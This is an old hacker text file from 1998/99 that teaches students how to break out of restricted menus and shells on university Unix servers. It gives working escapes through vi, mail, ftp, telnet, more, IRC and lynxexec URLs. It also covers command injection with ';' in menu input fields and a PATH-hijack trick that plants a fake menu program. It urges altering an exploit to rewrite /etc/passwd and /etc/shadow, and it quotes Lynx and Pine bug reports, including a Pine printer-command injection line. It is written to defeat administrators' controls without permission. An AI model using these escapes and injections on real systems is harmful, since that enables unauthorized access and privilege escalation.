HOW TO STOP A FUCKING MENU AND KILL THE STUPID LIMITATIONS V.2.2 (Restricted shells, menus and that kind of shit) by ET LoWNOISE 1998/99 et@cyberspace.org DISCLAIMER Learn. Often universities implement stupid restrictions in their servers And clients of student use that the only thing that they avoid is the correct use of the resources available for you and for the others, that pay a hi price to study in a quality college. But the common thing is that your university says that supports the Investigation, but this is simply a privilege of few and if you wish To investigate or to learn on something, the amount of estupid people That you have to fight against, thanks to the mistify technology policy, And more letters, etc. it will show you that in fact they do not help, they just collaborate with the increase of the technological mediocrity of this hell and beautifull country of mine. This document is not a great inspiration for 31337 gurus, it is a simple document so that any person with estupid limitations can jump them. MENU IN MY SHELL ACCOUNT (UNIX)? You wish to learn UNIX (to realize that MICROSUCKS stinks out) and to request an account shell in another server to learn, is something that would not give you for multiple reasons, like not being from advanced semesters or things like that. The only thing that you have its a beautiful account with a beautiful menu (implemented Menu that causes that any task takes 3 times the normal run time and avoids the possibility of having direct access to the system). The multiple ways to eliminate menu depend directly on the form as it were implemented and the services that render. For that reason we will begin using the simple way: 1. Services To jump the menu first you will have to know what applications you have normal access then some will have internal options that allow the execution of direct commands and/or in the best of cases take you to the shell prompt. A simple menu in general have the following services which in fact are direct calls to the applications: - E-mail (pine, mail) - File Transfer (FTP) - Connect to other server (telnet) - Basic system commands (ex. finger, vi) - Configuration Setup - Some kind of chat (ex. IRC) 1.1 Access to vi (Taken from alt.2600 FAQ) Vi its a tipic and powerful text editor that maybe you have access to, when selecting the option to edit or to see the content of a file stored in your account. This is taken from the FAQ of alt.2600 and is in fact the tipic and most known example that by obligation must be included in this document. Execute Vi and type this command: :shell=/bin/sh Then leave to the shell using this command: :shell NOTE: If you restricted shell prevents the use of the command " CD ", Execute FTP to your account and then you can take a walk by the files using " CD ". 1.2 Access to "mail" program If you have access to "mail" program for the handling of E-mail in your account follow the following steps: Execute the menu option that makes a call to the mail program. In some menus or restricted shells you have the possibility to choose whatt application is used to handle your mail. Choose "mail" (no pine) and execute it. If you do not have any new mail to read, mail informe you that it does not have mail to read and bring back the menu. Example. 1. Email (mail) <------- Select Option to E-Mail No mail for user1..... (It returned automatic to options menu) BEFORE THIS PLEASE SEND YOURSELF AN E-MAIL. 1. Email (mail) <------- Select Option to E-Mail Mail version ?. Type ? for help. "/var/spool/mail/user1": 1 messages > 1 user1@my.host.edu Thu Sep 1 1:11 1/98 "test" & Ok now we are at the mail prompt "&" so now just type this: &!/bin/sh[enter] $ <------------ Another dead menu :). Note: Many programs use the character "!" in order to talk about the command who allows the direct execution of shell commands, in the best case you must execute /bin/sh to leave to the shell (command interpreter). 1.3 FTP and Telnet FTP and Telnet they also have the capacity of being able to execute commands from the prompt of each one with the same character "!" like this: ftp> !ps <-------- !(command) PID TT STAT TIME COMMAND 2679 p2 S 0:01 -menu 2832 p2 R 0:00 ps telnet>!ps PID TT STAT TIME COMMAND 2679 p2 S 0:01 -menu 2832 p2 R 0:00 ps Sometimes depending on the initial configuration of your account, the execution of commands using methods like this causes that sometimes the program is not located and therefore not executed. Its recomended then that at the moment for executing any command give the complete path (localization within the system). Example. ftp> !/usr/bin/ps PID TT STAT TIME COMMAND 2679 p2 S 0:01 -menu 2832 p2 R 0:00 ps NOTE: Always try to execute !/bin/sh NOTE FOR WIN95/98 (winshit95/98) AND (winsucksNT) NT: The same applies for these stinking " operating systems ": ftp>!command.com Microsoft Windows NT DOS Copyright Microsoft Corp 1990-1996. C:\> With respect to FTP its very easy to get the prompt because it always appears after making or when ABORTING a connection. For telnet the problem is that some menus when giving the telnet option, immediately is going to request the host name or ip to connect itself without having the opportunity to use the prompt at any moment, but for this try to make a connection and in the connection process press keys CONTROL+ ] to cancel all work leaving you at the telnet prompt. 1.4 IRC If the menu o restricted shell has access to the IRC client (Internet Relay Chat) when entering, you can execute any command with /EXEC (command). 1.5 Lynx Lynx is the text client used in menus to get html pages (www). If the execution of commands is enabled in Lynx (negligence in the installation and configuration) it can be used special URLs to execute arbitrary commands in the system. Any command can be executed. The URLs used are lynxexec and lynxprog: Example. lynxexec:ls -l lynxprog:news lynxexec:/bin/sh Example. lynx lynxexec://localhost/finger 1.6 MORE Some restricted shells use a command line program called "more" to show a list, this program makes a pause when the screen is full of data and wait for the user to press the space bar to continue, and it show at the bottom of the screen the percent showed at that moment. If u think that u have access at any moment to this program (example: an option that show any anouncement about the system made by the administrator) type: !/bin/sh (this will execute the shell) $ type ? to see more options. -------------------------------------------------------------------------------- 2. Implementation Depends on the way they implemented the menu (programming, language, the form as it is executed) makes difficult or facilitates the tricks to jump the imposed restrictions. Thats the reason why it is possible that you need to modify a little the described forms so they can work. 2.1. TRAPS In fact im sure that this case does not apply but is worth the trouble to try (you neve know). " God works in mysterious ways ". In UNIX you have combinations of keys that when they are pressed they send a signal to the program that is executing. Depending on the sent signal the program will abort or suspend the execution. Multiple signals exist and if in the menu porgramming " traps " are not handled that control the behavior of the program (menu), when receiving a certain signal you could leave the menu without any problem. At the time of initiating the menu press: CONTROL + C (Abort execution) CONTROL + Z (Suspend execution) CONTROL + D NOTE: Again it is not probable that this work, just a crazy programmer will leave this kind of things behind. 2.2 Configuration Some menus have configuration (Setup) options, which you can modify at any time to choose what editor you use, what type of terminal or the mail program you prefer to work with. For negligence in the programming of the menu is possible that u can find fields that can be left in clean (empty) entering one or several spaces, in the bottom for example if we enter to text editor's configuration and we are requested to type the name of the program to use (Ex. pico, vi) when we return to the main menu and let us choose text editor's option the menu will make the call to the application that previously we have typed. If in the configuration we can leave the field in white as a group of typed spaces when we execute the menu and we are requested the name of the file to publish (edit) there in that moment we will be able to give him any command to execute. If u prefers it also instead of leaving in spaces the field, just place the command to execute,although this method is a little annoying if u will execute multiple commands. Example. (Setup Option) Type The Text Editor to use (Pico , Vi)?: _ <--- spaces (Main Menu, "Edit" Option ) Type the filename to edit: ps <------ Command PID TT STAT TIME COMMAND 2679 p2 S 0:01 -menu 2832 p2 R 0:00 ps This case depends on how was implemented the menu and how creative you can be. 2.3 Beginning & Setup Files (.login ,.profile) Commonly when you enter to your account, the shell automatically executes Some commands included in a certain file (on tcsh it is .profile, on other shells is .login ). Some administrators to execute the menu every time you logon to your account they include the line in this file. If the permits were not well placed to the file it is possible to edit this file or to upload using FTP a .profile or .login according to the case, eliminating the lines that executethe menu. (Or simply erase the complete file). If you can see the content of the setup file of the shell and you realize that the menu is called directly without including its path, you can create a file with the same name, containing one line as /bin/sh and then put in your account. If the PATH variable is not well defined and the execution of the menu isn't a direct call in the file /etc/passwd, when you enter to the account again the system will execute the mistaken menu (its kind of a Trojan Horse) , leaving you directly in the shell defined. NOTE: be careful with the permisions of the new file. 2.4 linking Commands Another form of executing commands is to use characters that link commands in the shell this way: user1> finger @some.host.edu;ps <---------------- Check the ";" [some.host.edu] Welcome to Linux version 2.0.30 at some.host.edu ! 4:02pm up 6 days, 2:51, 3 users, load average: 0.05, 0.02, 0.00 Login Name Tty Idle Login Time Office Office Phone user1 p0 1 Sep 11 14:38 (xxx.25.64.xxx) user2 p1 Sep 11 16:01 (xxx.25.65.xxx) user3 p3 4 Sep 11 15:29 (xxx.25.68.xxx) PID TTY STAT TIME COMMAND 9562 p1 S 0:00 -tcsh 9576 p1 R 0:00 ps user1> Now you have noticed that in one line you can link multiple commands and execute them one behind another. Likewise if in the menu they have not taken the care of eliminate characters like this one ";" , when is requested some parameter for some internal command , you add more necessary commands :). Example. (Finger Menu Option) Type the Host: www.host.edu;ps (this will execute "finger @www.host.edu;ps" ) [www.host.edu] Welcome to Linux version 2.0.30 at www.host.edu ! 4:02pm up 6 days, 2:51, 3 users, load average: 0.05, 0.02, 0.00 Login Name Tty Idle Login Time Office Office Phone user1 p0 1 Sep 11 14:38 (xxx.25.64.xxx) user2 p1 Sep 11 16:01 (xxx.25.65.xxx) user3 p3 4 Sep 11 15:29 (xxx.25.68.xxx) PID TTY STAT TIME COMMAND 9562 p1 S 0:00 -menu 9576 p1 R 0:00 ps Also work according to the application that in fact will be called with rerouting characters and others ( >>,<<,>,<,&,!,;,:,|). 2.5 Ok I can execute commands. So what can i do now? Everything: (Buffers Overflows, etc etc). Suddenly you don't find a way to leave directly to the shell but u can execute any command that u want. Modify an exploit that instead of executing in their code the /bin/sh ,executes a program that for example modifies the line in /etc/passwd and /etc/shadow so that executes directly a shell and not a menu when you log on. Compile it in another host and upload it to your account. Now execute it as if it was a simple command, the rest leaves to your imagination. Many ways exist to be able to surpass those small limitations that they like to create. Everything depends on the creativity and the desires to learn that you have. The curiosity will never be a crime. 3. COMMON PROGRAMS EXPLOITS Here are some recent exploits that can be useful according to the case: 3.1 Latest Lynx BUGS ------------------ Michal Zalewski (lcamtuf@IDS.PL) Sun, 6 Sep 1998 00:53:24 +0200 Trivial Overflows on: ..., ... o ... Chooses your favorite protocol, beautiful SEGV in 0x41414141. Also, Overflows in finger://, cso://, nntp:// and news://. Unfortunately they are not so easily exploitable. 1454 bytes are perfect for lynx 2.8.x under Linux. It can vary in other platforms. Nothing more to say. Me (Michal Zalewski (lcamtuf@IDS.PL)) reports similar overflows similar in the protocol mailto: months ago. I don't have idea if they have been fixed. Examples: http://dione.ids.pl/~lcamtuf/pliki/browsers.html.gz ------------------------------------------------------------------ Artur Grabowski (art@STACKEN.KTH.SE) Tue, 17 Nov 1998 17:06:00 +0100 Lynx has a feature that allows trojans. For users on systems where lynx is the login shell or somehow the only program allowed to run, the user can obtain a shell by simply "clicking" a link that looks like this: foo. Running hostile code is also easy with this feature: foo. The login shell (or something similiar) for eviluser@evilhost.foo prints out a few commands to run on the victim. 3.2 PINE Bugs (Chris Wilson ) Vulnerability in Pine, proven in version 3.95q, but it probably applies to all the versions up to 4.02 this vulnerability allows the execution of commands in restricted enviroments. When a printer is selected, it is possible to choose the option Personally selected print command." This allows to specify a command which pine will execute when a document will be printed. Changing the value of this selection. It is possible to execute any command when something is printed. For this reason administrators disable this with an option in the file pine.conf.fixed. But if you modify the file manually .pinerc, adding one line as: printer=test [] echo Hello! > test Then this will jump the imposed restrictions and it will execute the command each time that it is said that it is print any document. ------------------------------------------------------------------- If u dont like this document dont worry, dont read it. ET 1998/99. et@cyberspace.org <--- this one is the real one et@my.narco-goverment.sucks.co Colombia